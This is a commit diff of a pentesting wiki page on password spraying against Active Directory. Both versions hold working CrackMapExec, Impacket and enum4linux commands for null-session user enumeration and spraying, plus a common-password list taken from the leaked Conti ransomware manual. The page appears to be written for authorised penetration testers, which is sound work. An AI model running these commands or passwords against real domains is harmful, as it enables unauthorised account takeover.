tactics/credential_access/password_spraying/spraying-active-directory.md, before:

---
description: Methodology for performing password spraying attacks against active directory
---

# Password Spraying Active Directory

### Obtain Password Policy

```bash
# Get Password Policy with CrackMapExec (Unauthenticated)
cme smb $dc -u '' -p ''

# Get Password Policy with CrackMapExec
crackmapexec smb $dc -u $username -p $password --pass-pol

# Get Password Policy with Net Accounts
net accounts
```

### Get List of Users

```bash
# Get List of Users with CrackMapExec via RID Cycling (Unauthenticated)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups

# Get List of Users with CrackMapExec via RID Cycling
crackmapexec smb $dc -u $username -p $password --users

# Get List of Users with Impacket
GetADUsers.py $domain/$username:$password -all -dc-ip $dc

# Get List of Users with Enum4linux
enum4linux $dc -u $username -p $password -U

# Sort Usernames Obtained from Enum4Linux
cat usernameenum.txt | grep "user" | awk {'print $1'} | cut -d '[' -f 2 | cut -d ']' -f 1 | sort -u -f > UsernameList.txt
```

### Spraying

```bash
# Spray with CrackMapExec
crackmapexec smb $ip -u $username_list -p Winter2022! --continue-on-success
```

### Password List

These passwords were referenced from the published Conti manual and often work. This should be an unspoken rule, but ensure that your list is tailored for each engagement (year, month, etc).

```bash
Password1
Hello123
password
Welcome1
Acme@1
training
Password123
job12345
food1234
June2022
July2022
August22
August2022
Summer22
Summer2022
June2022!
July2022!
August22!
August2022!
Summer22!
Summer2022!
```

### References

{% embed url="https://wiki.porchetta.industries/smb-protocol/enumeration/enumerate-null-sessions" %}

Commit message:

GitBook: [#193] Additional updates to LDAP Relaying, Password Spraying and + Password Policy section

tactics/credential_access/password_spraying/spraying-active-directory.md, after:

---
description: Methodology for performing password spraying attacks against active directory
---

# Password Spraying Active Directory

This section contains some of my methodology and tips for performing password spraying attacks against Active Directory. Before spraying, I highly recommend that you first [enumerate the password policy](../../../pentesting/infrastructure/active-directory/password-policy.md) on the domain so that you don't lock out accounts.&#x20;

### Get List of Users

```bash
# Get List of Users with CrackMapExec via RID Cycling (Unauthenticated)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups

# Get List of Users with CrackMapExec via RID Cycling
crackmapexec smb $dc -u $username -p $password --users

# Get List of Users with Impacket
GetADUsers.py $domain/$username:$password -all -dc-ip $dc

# Get List of Users with Enum4linux
enum4linux $dc -u $username -p $password -U

# Sort Usernames Obtained from Enum4Linux
cat usernameenum.txt | grep "user" | awk {'print $1'} | cut -d '[' -f 2 | cut -d ']' -f 1 | sort -u -f > UsernameList.txt
```

### Spraying

```bash
# Spray with CrackMapExec
crackmapexec smb $ip -u $username_list -p Winter2022! --continue-on-success
```

### Password List

These passwords were referenced from the published [Conti manual](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) and often work. This should be an unspoken rule, but ensure that your list is tailored for each engagement (year, month, etc).

```bash
Password1
Hello123
password
Welcome1
Acme@1
training
Password123
job12345
food1234
June2022
July2022
August22
August2022
Summer22
Summer2022
June2022!
July2022!
August22!
August2022!
Summer22!
Summer2022!
```

### References

{% embed url="https://wiki.porchetta.industries/smb-protocol/enumeration/enumerate-null-sessions" %}
